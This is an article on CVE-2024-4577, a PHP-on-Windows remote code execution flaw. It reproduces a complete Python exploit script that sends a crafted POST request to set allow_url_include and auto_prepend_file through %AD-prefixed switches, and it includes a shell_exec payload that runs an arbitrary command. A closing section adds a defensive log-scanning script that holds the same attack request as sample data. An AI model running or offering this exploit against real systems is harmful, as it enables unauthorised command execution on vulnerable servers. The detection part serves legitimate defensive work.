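This article describes a PHP Windows remote code execution vulnerability that affects multiple PHP versions. The exploit is by Yesith Alvarez, and the article includes example code that exploits the vulnerability.
🎯 The vulnerability affects PHP 8.3 (* < 8.3.8), 8.2 (* < 8.2.20), 8.1 (* < 8.1.29) and other versions, and poses a security risk.
💻 The article provides code that exploits the vulnerability, including the defined payloads, the headers that are set, and the creation of a Session to send the requests.
📄 Sending a POST request with carefully crafted data to a specific URL may result in remote code execution.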
```python
# Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)
# Exploit Author: Yesith Alvarez
# Vendor Homepage: https://www.php.net/downloads.php
# Version: PHP 8.3.* < 8.3.8, 8.2.* < 8.2.20, 8.1.* < 8.1.29
# CVE : CVE-2024-4577

from requests import Request, Session
import sys
import json


def title():
    print('''
Author: Yesith Alvarez
Github: https://github.com/yealvarez
Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/
Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py
''')


def exploit(url, command):
    payloads = {
        '<?php echo "vulnerable"; ?>',
        '<?php echo shell_exec("'+command+'"); ?>'
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    s = Session()
    for payload in payloads:
        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
        req = Request('POST', url, data=payload, headers=headers)
        prepped = req.prepare()
        del prepped.headers['Content-Type']
        resp = s.send(prepped,
                      verify=False,
                      timeout=15)
        #print(prepped.headers)
        #print(url)
        #print(resp.headers)
        #print(payload)
        print(resp.status_code)
        print(resp.text)


if __name__ == '__main__':
    title()
    if(len(sys.argv) < 2):
        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))
        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))
        exit(0)
    else:
        exploit(sys.argv[1],sys.argv[2])
```
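For detection, the request shape this page describes (a query string that passes `d` switches prefixed with the byte `%AD` to set `allow_url_include` and `auto_prepend_file`) can be searched for in web-server access logs. The following is an added example, not part of the original post or the exploit author's code; the combined log format, the sample lines and the function name are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = '''\
203.0.113.7 - - [10/Jun/2024:10:01:02 +0000] "POST /?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 10 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jun/2024:10:01:05 +0000] "POST /?%add+allow_url_include%3D1 HTTP/1.1" 200 10 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2024:10:02:00 +0000] "GET /search.php?q=%C3%ADndice HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jun/2024:10:02:09 +0000] "GET /item.php?id=7&d=auto HTTP/1.1" 200 512 "-" "Mozilla/5.0"
'''

# client IP, method, request target and status from one combined-format line
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# A "d" switch at the start of an argument, written with byte 0xAD (as in the
# request on this page) or with a plain hyphen, followed by "+directive=".
# Matching on decoded bytes keeps %C3%AD (UTF-8 "í") from being flagged,
# which a plain substring search for "%AD" would do.
INI_SWITCH_RE = re.compile(rb'(?:^|\+)[\xad-]d\+([A-Za-z0-9_.]+)=')


def find_ini_override_requests(log_text):
    """Return (client_ip, method, status, [directive, ...]) per flagged request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        ip, method, target, status = m.groups()
        raw_query = target.partition('?')[2]
        # Percent-decode to bytes; handles %AD / %ad and %3d / %3D alike.
        decoded = unquote_to_bytes(raw_query)
        directives = [d.decode('ascii') for d in INI_SWITCH_RE.findall(decoded)]
        if directives:
            hits.append((ip, method, int(status), directives))
    return hits


if __name__ == '__main__':
    for hit in find_ini_override_requests(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request only shows that the server answered; whether the directives took effect depends on the PHP version and how PHP is invoked, so flagged hosts should be checked against the affected version ranges listed above.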